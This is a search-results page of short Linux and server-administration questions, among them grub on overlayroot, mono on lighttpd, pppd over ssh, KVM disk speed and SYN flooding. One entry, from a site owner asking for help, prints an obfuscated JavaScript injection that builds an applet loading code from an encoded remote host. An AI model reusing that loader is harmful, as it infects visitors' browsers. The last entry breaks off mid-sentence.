Search Results

Search found 45752 results on 1831 pages for 'ubuntu linux'.


  • How to update-grub on a system running overlayroot?

    - by mikepurvis
    We ship boxes configured with overlayroot, using the following overlayroot.conf:

        overlayroot=device:dev=/dev/sda6,timeout=20,recurse=0

    Which produces the following mount configuration:

        $ mount
        overlayroot on / type overlayfs (rw,errors=remount-ro)
        /dev/sda5 on /media/root-ro type ext3 (ro,relatime,errors=continue,user_xattr,acl,barrier=1,data=ordered)
        /dev/sda6 on /media/root-rw type ext3 (rw,relatime,errors=continue,user_xattr,acl,barrier=1,data=ordered)
        /dev/sda1 on /boot type ext3 (rw)

    As you can see, there are three key physical partitions: sda1 is /boot, sda5 is a read-only "factory" root, and sda6 is a "user" root which can be wiped at any point to restore the machine to its original factory state.

    Now, the problem arises when update-grub is run for any reason:

        $ sudo update-grub
        [sudo] password for administrator:
        /usr/sbin/grub-probe: error: cannot find a device for / (is /dev mounted?).

    Understandable, since / is an overlayfs. The contents of /usr/sbin/update-grub are:

        #!/bin/sh
        set -e
        exec grub-mkconfig -o /boot/grub/grub.cfg "$@"

    With /usr/sbin/grub-mkconfig being the business part of things. But the actual problem is in /usr/sbin/grub-probe, which is called by grub-mkconfig and is a binary.

    So my questions are: is there a parameter which can make grub-probe do the right thing when / is an overlayfs? And secondly, is there a way to hack or patch that in so that the update-grub script just does the right thing? Thanks.
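
    One workaround sometimes used with overlayroot (a hedged sketch, not from the question; it assumes the exact mount layout shown above) is to run update-grub inside a chroot of the read-only lower root, where / is a real block device, with /boot and the virtual filesystems bind-mounted in. Ubuntu's overlayroot package also ships an overlayroot-chroot helper that automates roughly this, if your image includes it.

        # sketch: run update-grub against the real lower root (/media/root-ro)
        sudo mount --bind /boot /media/root-ro/boot
        sudo mount --bind /dev  /media/root-ro/dev
        sudo mount --bind /proc /media/root-ro/proc
        sudo mount --bind /sys  /media/root-ro/sys
        sudo chroot /media/root-ro update-grub   # grub.cfg lands on /boot (sda1), which is rw
        sudo umount /media/root-ro/{boot,dev,proc,sys}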

    Read the article

  • Error headers: ap_headers_output_filter() after putting cache header in htaccess file

    - by Brad
    Receiving error:

        [debug] mod_headers.c(663): headers: ap_headers_output_filter()

    after I included this within the htaccess file:

        # 6 DAYS
        <FilesMatch "\.(ico|pdf|flv|jpg|jpeg|png|gif|js|css|swf)$">
            Header set Cache-Control "max-age=518400, public"
        </FilesMatch>
        # 2 DAYS
        <FilesMatch "\.(xml|txt)$">
            Header set Cache-Control "max-age=172800, public, must-revalidate"
        </FilesMatch>
        # 2 HOURS
        <FilesMatch "\.(html|htm)$">
            Header set Cache-Control "max-age=7200, must-revalidate"
        </FilesMatch>

    Any help is appreciated as to what I could do to fix this?
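
    Worth noting (my reading, not the article's): the line above is logged at [debug] level, so it is mod_headers tracing its output filter rather than reporting a failure. A hedged sketch of checking the headers and then quieting the trace (the URL is a placeholder; LogLevel is a standard Apache directive set in the server config, not .htaccess):

        # verify the headers are actually being set:
        #   curl -I http://your-site.example/style.css | grep -i cache-control
        # then raise the log level so debug-level traces disappear:
        LogLevel warn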

    Read the article

  • mono 3.0.2 + xsp + lighttpd delivers empty page

    - by Nefal Warnets
    I needed MVC 4 (and basic .NET 4.5) support, so I downloaded mono 3.0.2 and deployed it on a lighttpd 1.4.28 installation, together with xsp-2.10.2 (the latest I could find). After going through the config tutorials I managed to get the fastcgi server to spawn, but all pages are served empty: even if I go to nonexistent URLs or direct .aspx files I get an empty HTTP 200 response. The log file on Debug shows nothing suspicious. Here is the log:

        [2012-12-12 15:15:38Z] Debug Accepting an incoming connection.
        [2012-12-12 15:15:38Z] Debug Record received. (Type: BeginRequest, ID: 1, Length: 8)
        [2012-12-12 15:15:38Z] Debug Record received. (Type: Params, ID: 1, Length: 801)
        [2012-12-12 15:15:38Z] Debug Record received. (Type: Params, ID: 1, Length: 0)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_SOFTWARE = lighttpd/1.4.28)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_NAME = xxxx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (GATEWAY_INTERFACE = CGI/1.1)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_PORT = 80)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_ADDR = xxxx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (REMOTE_PORT = xxx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (REMOTE_ADDR = xxxx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SCRIPT_NAME = /ViewPage1.aspx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (PATH_INFO = )
        [2012-12-12 15:15:38Z] Debug Read parameter. (SCRIPT_FILENAME = /data/htdocs/ViewPage1.aspx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (DOCUMENT_ROOT = /data/htdocs)
        [2012-12-12 15:15:38Z] Debug Read parameter. (REQUEST_URI = /ViewPage1.aspx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (QUERY_STRING = )
        [2012-12-12 15:15:38Z] Debug Read parameter. (REQUEST_METHOD = GET)
        [2012-12-12 15:15:38Z] Debug Read parameter. (REDIRECT_STATUS = 200)
        [2012-12-12 15:15:38Z] Debug Read parameter. (SERVER_PROTOCOL = HTTP/1.1)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_HOST = xxxxx)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_CONNECTION = keep-alive)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_CACHE_CONTROL = max-age=0)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_USER_AGENT = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT = text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_ENCODING = gzip,deflate,sdch)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_LANGUAGE = en-US,en;q=0.8)
        [2012-12-12 15:15:38Z] Debug Read parameter. (HTTP_ACCEPT_CHARSET = ISO-8859-1,utf-8;q=0.7,*;q=0.3)
        [2012-12-12 15:15:38Z] Debug Record received. (Type: StandardInput, ID: 1, Length: 0)
        [2012-12-12 15:15:38Z] Debug Record sent. (Type: EndRequest, ID: 1, Length: 8)

    lighttpd config:

        server.modules += ( "mod_fastcgi" )
        include "conf.d/mono.conf"
        $HTTP["host"] !~ "^vdn\." {
            $HTTP["url"] !~ "\.(jpg|gif|png|js|css|swf|ico|jpeg|mp4|flv|zip|7z|rar|psd|pdf|html|htm)$" {
                fastcgi.server += ( "" => ((
                    "socket" => mono_shared_dir + "fastcgi-mono-server",
                    "bin-path" => mono_fastcgi_server,
                    "bin-environment" => (
                        "PATH" => mono_dir + "bin:/bin:/usr/bin:",
                        "LD_LIBRARY_PATH" => mono_dir + "lib:",
                        "MONO_SHARED_DIR" => mono_shared_dir,
                        "MONO_FCGI_LOGLEVELS" => "Debug",
                        "MONO_FCGI_LOGFILE" => mono_shared_dir + "fastcgi.log",
                        "MONO_FCGI_ROOT" => mono_fcgi_root,
                        "MONO_FCGI_APPLICATIONS" => mono_fcgi_applications
                    ),
                    "max-procs" => 1,
                    "check-local" => "disable"
                )) )
            }
        }

    The referenced mono.conf:

        index-file.names += ( "index.aspx", "default.aspx" )
        var.mono_dir = "/usr/"
        var.mono_shared_dir = "/tmp/"
        var.mono_fastcgi_server = mono_dir + "bin/" + "fastcgi-mono-server4"
        var.mono_fcgi_root = server.document-root
        var.mono_fcgi_applications = "/:."

    The document root for this server is /data/htdocs and the ASP.NET files reside there. The lighttpd error logs show nothing. Any help is greatly appreciated!

    Read the article

  • How to permanently add wireless interfaces with iw

    - by walli
    How can I permanently add virtual wireless interfaces to my network configuration with iw? I created the following interfaces:

        iw phy phy0 interface add vwlan0 type station
        iw phy phy0 interface add vwlan1 type __ap

    The first is configured as a wifi client connecting to an existing network (wpa_supplicant); the second is configured as a wireless hotspot (hostapd + dnsmasq). The setup works, but now I can't quite figure out the best strategy for saving this configuration permanently. So far I have:

        - made an init script for wpa_supplicant
        - made an init script for the hotspot
        - set the virtual adapter network settings in /etc/network/interfaces

    But all of this depends on the wireless interfaces being created first. What would be the best way to make sure these interfaces are created before the network is set up and the services are run? As a bonus, since this wireless adapter is a USB device, would it be possible to have the interfaces created (and the services started) when the adapter is hotplugged? I know you can execute code after a network interface is up, but the wlan0 interface that is hotplugged should never be up. The operating system is Raspbian.
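
    One hedged approach (my sketch, not from the question; interface and phy names are taken from the commands above) is to let ifupdown create the virtual interfaces itself via pre-up hooks in /etc/network/interfaces, so they exist before wpa_supplicant or hostapd start. The wpa-conf hook comes from the wpasupplicant package; addresses are placeholders.

        # /etc/network/interfaces (sketch)
        auto vwlan0
        iface vwlan0 inet dhcp
            pre-up iw phy phy0 interface add vwlan0 type station || true
            wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
            post-down iw dev vwlan0 del

        auto vwlan1
        iface vwlan1 inet static
            address 192.168.50.1
            netmask 255.255.255.0
            pre-up iw phy phy0 interface add vwlan1 type __ap || true
            post-down iw dev vwlan1 del

    For the hotplug case, a udev rule that runs ifup on the virtual interfaces when the USB adapter's phy appears would be the usual route, but that part is left as an exercise here.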

    Read the article

  • Weird scp behavior

    - by bryan1967
    I am trying to scp a file, but it returns immediately with the date and no file is copied:

        [cosmo] Downloads > scp V17530-01_1of2.zip bryan@elphaba:Downloads
        bryan@elphaba's password:
        Sat Apr 10 13:35:41 PDT 2010

    I have never seen this before. I have confirmed that sshd is running on the target system and that the firewall is allowing 22/tcp. Any help on what is going on would be very much appreciated. Thanks, Bryan
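
    A common cause of this symptom (my suggestion, not confirmed by the question) is a remote shell startup file that prints output for non-interactive shells: anything the remote ~/.bashrc writes to stdout breaks scp's protocol, and the stray date line above looks like exactly that. A minimal sketch of guarding such output on the remote host:

        # remote ~/.bashrc (sketch): only produce output in interactive shells
        case $- in
            *i*) date ;;   # or whatever command currently prints unconditionally
        esac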

    Read the article

  • PXE Boot Fedora 17 Error

    - by DrifterDave
    When trying to boot into the latest Fedora 17 CD via PXE, I am presented with the following error:

        PXE dracut: fatal: no or empty root= argument

    So, I added a root= line to my fedora menu entry (shown below), but receive the following error:

        dracut Warning: Unable to process initqueue

    Any assistance would be greatly appreciated.

    Fedora.menu:

        LABEL 1
            MENU LABEL fedora 17 (32-bit)
            KERNEL fedora/17/i386/vmlinuz0
            APPEND method=nfs:192.168.1.101:/srv/install/fedora/17/i386/ lang=us keymap=us ip=dhcp ksdevice=eth1 noipv6 root=/dev/ram0 initrd=fedora/17/i386/initrd0.img ramdisk_size=10000
            TEXT HELP
            Install Fedora 17 (32-bit)
            ENDTEXT

    Read the article

  • Can't access Postfix TLS/SSL

    - by skerit
    I have set up Postfix with TLS/SSL, and it works correctly: every test on the machine itself (with telnet) runs fine. However, when I try to access the server from somewhere else, it fails. So port 587 (and the rest) appears to be blocked for some reason, but I don't really know where.
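
    A hedged checklist for narrowing this down (hostnames are placeholders, column values in master.cf vary by distribution): verify the ports are listening on a public address, that the submission service is enabled, and then test from outside.

        # on the server: is Postfix listening on more than 127.0.0.1?
        ss -tlnp | grep -E ':(25|465|587)\b'
        # submission must be uncommented in /etc/postfix/master.cf, e.g.
        #   submission inet n - - - - smtpd
        # then: postfix reload

        # from a remote machine (mail.example.com is a placeholder):
        nc -vz mail.example.com 587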

    Read the article

  • Unable to run openoffice in headless mode

    - by uswaretech
    I want to automate some PPT to PDF conversions, so I want to run OpenOffice in headless mode for scripting. On my machine with X running, I can start OpenOffice in headless mode via:

        soffice -accept="socket,port=8100;urp;" -headless

    This doesn't seem to work on a server where X is not running:

        $ soffice -accept="socket,port=8100;urp;" -headless
        /usr/lib/openoffice/program/soffice.bin X11 error: Can't open display:
        Set DISPLAY environment variable, use -display option
        or check permissions of your X-Server
        (See "man X" resp. "man xhost" for details)
        $

    The error doesn't seem to make sense, as the point of specifying -headless was that I would not need X, while this command seems to look for X anyway.
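
    Older OpenOffice builds still want an X display even with -headless. A commonly used workaround (a sketch, assuming the xvfb package is available) is to give it a virtual framebuffer:

        # run soffice under a throwaway virtual X server so -headless has a display to open
        xvfb-run -a soffice -accept="socket,port=8100;urp;" -headless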

    Read the article

  • Monit won't restart process

    - by bresc
    I just don't get it; monit behaves very strangely.

        check process thin with pidfile /var/run/thin.4567.pid
            start program = "/srv/Pusher/server start"
            stop program = "/srv/Pusher/server stop"
            if failed host 127.0.0.1 port 4567 protocol http then restart
            group server

    This is the process that should be restarted. So I tested monit and stopped the process, but it is showing only this:

        Process 'thin'
            status              Does not exist
            monitoring status   monitored
            data collected      Wed Mar 24 01:18:55 2010

    However, when I run "monit validate" it starts the service. Am I missing something? Thx
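
    Worth checking (a guess on my part, not from the question): whether the monit daemon is actually running in the background with a sensible poll interval. Monit only acts on its polling cycle, while "monit validate" forces an immediate check of all services, which would explain why that command starts the service. A sketch of the relevant bits (the interval is an example):

        # /etc/monit/monitrc (sketch) - poll every 60 seconds
        set daemon 60
        # confirm the daemon is alive and watching:
        #   monit status
        #   monit summary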

    Read the article

  • Binding Super+C Super+V to Copy and Paste

    - by solo
    For some time I've been interested in binding the Windows Key (Super_L) on my keyboard to Copy and Paste, for no other reason but convenience and consistency between my desktop and my MacBook. I thought that I was close after reading about xmodmap and executing the following:

        $ # re-map Super_L to Mode_switch, the 3rd col in keymap table `xmodmap -pke`
        $ xmodmap -e "keycode 133 = Mode_switch"
        $ # map Mode_switch+c to copy
        $ xmodmap -e "keycode 54 = c C XF86_Copy C"
        $ # map Mode_switch+v to paste
        $ xmodmap -e "keycode 55 = v V XF86_Paste V"

    Unfortunately, XF86Copy and XF86Paste don't seem to work, at all. They are listed in /usr/include/X11/XF86keysym.h, and xev shows that the key sequence is being interpreted by X as XF86Paste and XF86Copy. Do these symbols actually work? Do they have to have application level support?
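
    For what it's worth, XF86Copy/XF86Paste only do something if the toolkit or application binds them, and many do not. A hedged alternative sketch (assuming the xbindkeys and xdotool packages are installed) translates Super+C/Super+V into the Ctrl+C/Ctrl+V events applications already handle:

        # ~/.xbindkeysrc (sketch)
        "xdotool key --clearmodifiers ctrl+c"
            Mod4 + c
        "xdotool key --clearmodifiers ctrl+v"
            Mod4 + v
        # then run xbindkeys (and add it to your session autostart)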

    Read the article

  • Malware Cross Site Scripting attack / XSS Attack?

    - by user124176
    I have been hit by a Cross Site Scripting / XSS / RFI attack, but I can't find it anywhere in the source of the files, and the hashes of the files have not changed according to the OSSEC HIDS that I run with real-time monitoring on all web directories. The attack happens on IE9 only, and it appends JavaScript code like the sample beneath; notice that it starts after the /html tag closes normally:

        scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73");

    No code has been changed on file as far as my HIDS says, but I can see the following in my error log:

        File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee

    In the access log, the following:

        IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"
        IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"

    Now, the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java class class.class, yet it still looks like a local call to the server, and it was getting a "404 File not found / 504 Gateway Timeout" (the attack was blocked by the local machine, hence the timeout / not found).

    Any idea on how to prevent the attack? I'm working on using HTML Purifier, but that might not be the correct approach, according to some replies I'm getting on their forum :)

    Kind regards, Steven
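
    Since OSSEC says the files on disk are unchanged, a hedged first step (my suggestion; the search string is taken from the sample above, and the database name is a placeholder) is to check whether the payload is injected from database-stored content or a template cache rather than from the files the HIDS watches:

        # search the whole vhost, including caches, for the obfuscated loader
        grep -RIl 'enuwjo' /var/www/vhosts/superkids.dk
        # if the site is database-driven, dump it and search the dump as well
        mysqldump -u root -p superkids_db | grep -c 'enuwjo'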

    Read the article

  • possible SYN flooding on port 80. Sending cookies

    - by Sparsh Gupta
    I recently had some server downtime. I looked everywhere, and the only thing I found in my log files is:

        Feb 17 18:58:04 localhost kernel: possible SYN flooding on port 80. Sending cookies.
        Feb 17 18:59:33 localhost kernel: possible SYN flooding on port 80. Sending cookies.

    Can someone give me more information about it? What is it, how can I debug the cause, and how can I fix it? I also posted "ip_conntrack suddenly became too large", which has another data point I found unusual; I am wondering if the two things are connected, as they occurred at exactly the same time but on different servers (one on the reverse proxy and the other on the actual backend Varnish server). Thanks
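
    For context (my summary, not the article's): the message means the kernel's SYN backlog for port 80 filled up and it fell back to SYN cookies, which can be a real flood or simply a burst of legitimate connections outrunning the backlog. A hedged sketch of the knobs usually inspected (values are examples, not recommendations):

        # current settings
        sysctl net.ipv4.tcp_syncookies net.ipv4.tcp_max_syn_backlog net.core.somaxconn
        # count half-open connections while the message is appearing
        ss -nt state syn-recv | wc -l
        # example of raising the backlog temporarily; persist in /etc/sysctl.conf if it helps
        sysctl -w net.ipv4.tcp_max_syn_backlog=4096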

    Read the article

  • SSL certificates work fine from command line but fails in script

    - by jrallison
    I'm trying to set up email notifications for my continuous integration server. I have a script which uses nail to send the email when the build works:

        #!/bin/bash
        echo "Build Worked!" | nail -A myisp -s 'Build Success' [email protected]

    When I run this from the command line with sh build-worked, it works and I receive the email. However, when I start the continuous integration server, which executes the same script, I get the following error:

        nail: /opt/bitnami/common/lib/libssl.so.0.9.8: no version information available (required by nail)
        nail: /opt/bitnami/common/lib/libcrypto.so.0.9.8: no version information available (required by nail)
        Error with certificate at depth: 0
         issuer = /C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/[email protected]
         subject = /C=US/ST=California/L=Mountain View/O=Google Inc/CN=smtp.gmail.com
         err 20: unable to get local issuer certificate
        Continue (y/n)? could not initiate SSL/TLS connection: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed . . . message not sent.

    I must be missing some configuration - any ideas?
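
    One plausible reading (hedged; the library paths come from the error above): under the CI server the script inherits Bitnami's environment, so nail runs against /opt/bitnami's OpenSSL and never finds a usable CA bundle. A sketch of pointing nail at a CA file explicitly (option names as in Heirloom mailx/nail; the bundle path varies by distribution):

        # ~/.mailrc of the user the CI server runs as
        set ssl-ca-file=/etc/ssl/certs/ca-certificates.crt
        # or, if certificate checking is not a concern on this host:
        # set ssl-verify=ignore

        # and/or, in the build script, avoid inheriting Bitnami's library path:
        # unset LD_LIBRARY_PATH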

    Read the article

  • Why doesn't pppd over ssh work here? Why can't I kill pppd?

    - by Peter V. Mørch
    I'm trying to set up a simple ppp tunnel over ssh. It works on several machines just fine, but on one machine pppd gets "stuck":

        > pgrep pppd | xargs ps up
        USER       PID %CPU %MEM   VSZ  RSS TTY    STAT START   TIME COMMAND
        root      4178  0.0  0.1  3020 1088 pts/1  Ds+  05:28   0:00 /usr/sbin/pppd

    Any attempt to kill it (even sudo kill -9 4178) has no effect that I can see, and strace -p 4178 also hangs similarly. After it has been started for a while, I start getting messages in dmesg like those shown at the end.

    It is started like so from another machine:

        ssh -t root@server /usr/sbin/pppd passive noauth

    When I do this to one of the machines that work, the remote end's pppd spits out garbage/binary data to the console (as expected). When I do it to the one that fails, I get no output from pppd, but the ssh session eventually times out. If I instead ssh to the machine and then run /usr/sbin/pppd passive noauth as a separate step, I also get the expected binary output.

    I now have a couple of questions:

        - What could be up with the one machine where pppd fails? I don't even know where to start looking.
        - What could be the difference between ssh -t root@server /usr/sbin/pppd passive noauth in a single step, and ssh root@server followed by /usr/sbin/pppd passive noauth in two steps?
        - How can it be that I can't kill the process even with sudo kill -9? The only way I know is to reboot.

    (I've tried searching for something similar but didn't get anywhere, so I'm sorry I don't have any more leads.) Any ideas? The problem machine runs Debian on VMware "hardware" (as do the ones that work), and it exhibits the problem when cloned, on both Debian lenny (original) and squeeze (after upgrade).

    dmesg entries:

        [ 1198.727248] INFO: task pppd:4178 blocked for more than 120 seconds.
        [ 1198.727507] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
        [ 1198.727904] pppd D ece2dc9c 0 4178 4174 0x00000004
        [ 1198.727908] 00000098 00000082 f2503520 ece2dc9c 0000b1e7 00000000 c148d1c0 c148d1c0
        [ 1198.727913] f2a06100 f6e071c0 00000000 ece2dc18 f5cd07e0 00000000 ece2d400 ece2dc9d
        [ 1198.727918] 00c52300 ece2dcbc f67bfef8 ec98e480 f291cec0 00000000 c10cf5b0 c10dfd21
        [ 1198.727923] Call Trace:
        [ 1198.727926] [<c10cf5b0>] ? nameidata_to_filp+0x37/0x41 [ 1198.727929] [<c10dfd21>] ? dput+0x21/0xb7 [ 1198.727932] [<c11cfecc>] ? tty_ldisc_ref_wait+0x5f/0x76 [ 1198.727935] [<c104de7a>] ? wake_up_bit+0x5c/0x5c [ 1198.727938] [<c11cb91b>] ? tty_ioctl+0x85f/0x8ba [ 1198.727941] [<c10fec18>] ? do_lock_file_wait+0x3d/0xd9 [ 1198.727944] [<c1162c97>] ? _copy_from_user+0x2b/0x102 [ 1198.727946] [<c11cb0bc>] ? tty_check_change+0xb9/0xb9 [ 1198.727949] [<c10dbeb7>] ? do_vfs_ioctl+0x485/0x4c7 [ 1198.727952] [<c10db59a>] ? do_fcntl+0x24f/0x3a2 [ 1198.727954] [<c10dbf3a>] ? sys_ioctl+0x41/0x58 [ 1198.727957] [<c12c6a1f>] ? sysenter_do_call+0x12/0x28
        [ 1318.457225] INFO: task sshd:4174 blocked for more than 120 seconds.
        [ 1318.457500] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
        [ 1318.457896] sshd D f25024cc 0 4174 2393 0x00000000
        [ 1318.457901] 00000098 00000086 f2a06940 f25024cc 0000b246 00000000 c148d1c0 c148d1c0
        [ 1318.457906] f2503520 f6e071c0 00000000 3f056585 0000000f ece2d4bc 3f056585 f2503520
        [ 1318.457911] ec98bb38 ec98bbdc 00000000 00000000 00000000 c12c09b5 f2503520 c10327cb
        [ 1318.457916] Call Trace:
        [ 1318.457926] [<c12c09b5>] ? schedule_hrtimeout_range_clock+0x3c/0xd9 [ 1318.457931] [<c10327cb>] ? try_to_wake_up+0x13f/0x13f [ 1318.457935] [<c11cfecc>] ? tty_ldisc_ref_wait+0x5f/0x76 [ 1318.457940] [<c104de7a>] ? wake_up_bit+0x5c/0x5c [ 1318.457943] [<c11c9ad3>] ? tty_poll+0x32/0x5e [ 1318.457947] [<c10dd4d5>] ? do_select+0x2a1/0x42e [ 1318.457950] [<c10dcb83>] ? poll_freewait+0x69/0x69 [ 1318.457953] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457955] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457958] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457960] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457963] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457965] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457968] [<c10dcc25>] ? __pollwait+0xa2/0xa2 [ 1318.457971] [<c10429c2>] ? lock_timer_base+0x19/0x35 [ 1318.457974] [<c1042eb5>] ? __mod_timer+0x10c/0x116 [ 1318.457977] [<c1042f89>] ? mod_timer+0x69/0x6e [ 1318.457981] [<c121325d>] ? sk_reset_timer+0xc/0x16 [ 1318.457984] [<c1252f57>] ? tcp_event_new_data_sent+0x66/0x6b [ 1318.457987] [<c1255b85>] ? tcp_write_xmit+0x7a7/0x86a [ 1318.457990] [<c121760d>] ? __alloc_skb+0x50/0xfd [ 1318.457994] [<c12c12bc>] ? _raw_spin_lock_bh+0x8/0x1e [ 1318.457996] [<c1212e98>] ? release_sock+0x10/0xc4 [ 1318.457999] [<c124b543>] ? tcp_sendmsg+0x6dd/0x7b7 [ 1318.458003] [<c1162c97>] ? _copy_from_user+0x2b/0x102 [ 1318.458006] [<c10dd7a0>] ? core_sys_select+0x13e/0x1c3 [ 1318.458009] [<c12102a3>] ? sock_aio_write+0xc0/0xd4 [ 1318.458012] [<c10d0655>] ? do_sync_write+0xa0/0xe4 [ 1318.458016] [<c10b141c>] ? handle_mm_fault+0x222/0x238 [ 1318.458019] [<c10f6096>] ? fsnotify+0x1de/0x1f9 [ 1318.458022] [<c10dd9e8>] ? sys_select+0x6e/0x8f [ 1318.458024] [<c10d105e>] ? sys_write+0x3c/0x63 [ 1318.458028] [<c12c6a1f>] ? sysenter_do_call+0x12/0x28
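
    A note on the third question (general kernel behaviour, not specific to this report): the "D" in the STAT column is uninterruptible sleep, and processes in that state ignore all signals, including SIGKILL, until whatever they are blocked on completes. A hedged sketch of ways to see where the task is stuck (both depend on kernel config and sysrq being enabled):

        cat /proc/4178/stack          # where the task is blocked, if the kernel exposes it
        echo w > /proc/sysrq-trigger  # dump all blocked tasks to dmesg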

    Read the article

  • KVM slow guest i/o

    - by Akarot
    Host: Debian 6.0 (squeeze) with qemu-kvm and libvirt from squeeze-backports:

        ii qemu-kvm    1.0+dfsg-8~bpo60+1
        ii libvirt-bin 0.9.8-2~bpo60+2

    It has 3 TB SATA drives with software RAID and LVM, and a sequential write speed of ~140 MB/s measured with:

        dd bs=1M count=512 if=/dev/zero of=test conv=fdatasync

    The elevator is set to cfq.

    Guest: Debian 6.0 (squeeze), using LVM as storage. The drivers are virtio with cache='none'. Sequential write speed is considerably slower, at only 25-50 MB/s. The elevator is set to noop.

    I'm running out of ideas for further tweaks, but I'm sure the I/O speed should be much faster, because many people report almost native performance with LVM.
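
    One knob that is often tried in this situation (a hedged sketch; the source LV path is a placeholder, and whether it helps depends on the qemu build) is switching the virtio disk to native AIO in the libvirt domain XML, alongside the cache='none' already in use:

        <disk type='block' device='disk'>
          <driver name='qemu' type='raw' cache='none' io='native'/>
          <source dev='/dev/vg0/guest-root'/>   <!-- placeholder LV path -->
          <target dev='vda' bus='virtio'/>
        </disk>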

    Read the article

  • How can I use VirtualDocumentRoot to serve the www subdomain with SSL enabled?

    - by mdgreenwald
    I am able to serve http://www.domain.com and http://domain.com, and https://domain.com works fine too. But https://www.domain.com does not work for some reason. I even created a www.domain.com entry in my sites-available folder and enabled it, then reloaded the configuration, and it still doesn't work. I have a wildcard certificate, so that is NOT the problem.

        <IfModule mod_ssl.c>
        <VirtualHost *:443>
            ServerAdmin [email protected]
            ServerName *.domain.com:443
            ServerAlias www.domain.com
            VirtualDocumentRoot /var/www/%0

    Thanks for any help.
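
    One thing worth checking (a hedged guess, not a confirmed diagnosis): Apache's ServerName directive does not accept wildcards, so "ServerName *.domain.com:443" may prevent this vhost from matching as intended; wildcards belong in ServerAlias. A sketch of that variant, with the truncated block closed for completeness:

        <IfModule mod_ssl.c>
        <VirtualHost *:443>
            ServerAdmin [email protected]
            ServerName domain.com
            ServerAlias domain.com *.domain.com
            VirtualDocumentRoot /var/www/%0
            SSLEngine on
            # SSLCertificateFile / SSLCertificateKeyFile for the wildcard cert go here
        </VirtualHost>
        </IfModule>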

    Read the article

  • Debian and Multipath IO problem

    - by tearman
    Basically the situation is: I have a box running Debian. Internally the box has an Intel SCSI RAID controller controlling two hard drives in RAID1 mode, which is where the OS is installed. Further, I have a QLogic fibre channel adapter that connects the unit to a fibre channel SAN.

    My installation process is: install Debian to the local drives, leaving the QLogic firmware out of it for the time being. Once I get the unit online, I install the firmware drivers. This flips my internal drives from /dev/sda to /dev/sdc, which is a bit annoying but recoverable (I should probably address these by UUID anyway). Once I'm back online, I have to install multipath-tools (the SAN is a multipath framework). However, once I reboot the machine again, it fails on boot after discovering multipath targets, saying my local drives are busy and cannot be mounted to /root.

    Any help with what may be the problem here? Or at least how to disable multipath until after the unit boots, so it ignores the internal drives?
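
    A common way to keep multipath's hands off local disks (a hedged sketch; the WWID below is a placeholder you would replace with the value reported for the internal RAID volume by scsi_id or multipath -ll) is a blacklist in multipath.conf, applied to the initramfs so it takes effect at boot:

        # /etc/multipath.conf
        blacklist {
            wwid "3600508b1001c0000000000000000"   # placeholder WWID of the internal RAID1 volume
            devnode "^sda$"                         # or blacklist by device node, if names are stable
        }
        # then rebuild the initramfs so the blacklist applies during early boot:
        #   update-initramfs -u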

    Read the article

  • How to get 32 bit version of libraries on Ubuntu 64 bit?

    - by Olivier Lalonde
    I'm trying to compile a program which uses Google's V8 library (which is 32-bit). Therefore any library I use within my program also has to be 32-bit. Where can I download the 32-bit versions of libraries on Ubuntu 64-bit? More specifically, I'm looking for the 32-bit version of libnotify. These are the errors I am getting right now:

